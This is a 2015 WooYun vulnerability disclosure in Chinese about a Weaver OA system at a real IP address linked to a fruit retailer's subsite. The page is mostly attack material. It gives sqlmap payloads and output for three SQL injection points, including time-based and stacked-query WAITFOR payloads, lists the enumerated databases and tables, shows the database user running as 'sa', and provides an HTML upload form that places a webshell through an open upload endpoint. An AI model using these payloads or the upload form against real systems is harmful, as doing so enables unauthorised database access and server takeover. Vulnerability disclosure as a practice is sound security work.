当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132002

漏洞标题:天天果园某分站存在多处SQL注入,且可任意上传导致GetShell (二)

相关厂商:fruitday.com

漏洞作者: 浮萍

提交时间:2015-08-06 10:10

修复时间:2015-08-10 19:13

公开时间:2015-08-10 19:13

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-06: 细节已通知厂商并且等待厂商处理中
2015-08-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

另外一个
至少三处SQL 注入
任意上传

详细说明:

可以参考http://wooyun.org/bugs/wooyun-2010-0130601
http://210.14.78.115/

选区_101.png


通过查看代码可以知道这还是泛微的系统。。。
构造注入点:
首先看第一处:http://210.14.78.115/page/maint/login/Page.jsp?templateId=8&logintype=1&gopage=&message=55

GET parameter 'templateId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 60 HTTP(s) requests:
---
Parameter: templateId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: templateId=8 AND 4607=4607&logintype=1&gopage=&message=55
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: templateId=8 WAITFOR DELAY '0:0:5'&logintype=1&gopage=&message=55
---


web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008


数据库

available databases [8]:
[*] master
[*] model
[*] msdb
[*] oa
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] TUOYISZWL


current database:    'oa'
current user:    'sa'


看oa中的表
一千多个 就不细看了

选区_102.png


Database: TUOYISZWL
[18 tables]
+----------------+
| TuoYi_Admin    |
| TuoYi_Content  |
| TuoYi_File     |
| TuoYi_HR       |
| TuoYi_IndexPic |
| TuoYi_Limits   |
| TuoYi_Link     |
| TuoYi_Log      |
| TuoYi_News     |
| TuoYi_NewsType |
| TuoYi_Other    |
| TuoYi_OtherPic |
| TuoYi_OtherPro |
| TuoYi_PinPai   |
| TuoYi_ProPic   |
| TuoYi_Project  |
| TuoYi_QuYu     |
| TuoYi_TopPic   |
+----------------+


漏洞证明:

第二处

http://210.14.78.115/weaver/weaver.email.FileDownloadLocation?fileid=39*&download=1


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: http://210.14.78.115:80/weaver/weaver.email.FileDownloadLocation?fileid=39;WAITFOR DELAY '0:0:5'--&download=1
---


数据库

available databases [8]:
[*] master
[*] model
[*] msdb
[*] oa
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] TUOYISZWL


第三处:

http://210.14.78.115//homepage/LoginHomepage.jsp?hpid=52*&isfromportal=1


URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 115 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: http://210.14.78.115:80//homepage/LoginHomepage.jsp?hpid=52 WAITFOR DELAY '0:0:5'&isfromportal=1
---


四任意文件上传getshell
构造表单

<form method='post' action='http://210.14.78.115/tools/SWFUpload/upload.jsp'  enctype="multipart/form-data" > 
<input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/>
<button type=submit value="getshell">getshell</button> </form>


选区_099.png


访问http://210.14.78.115/null1.jsp

选区_100.png


修复方案:

注意排查

版权声明:转载请注明来源 浮萍@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-10 19:13

厂商回复:

该ip不是公司ip

最新状态:

暂无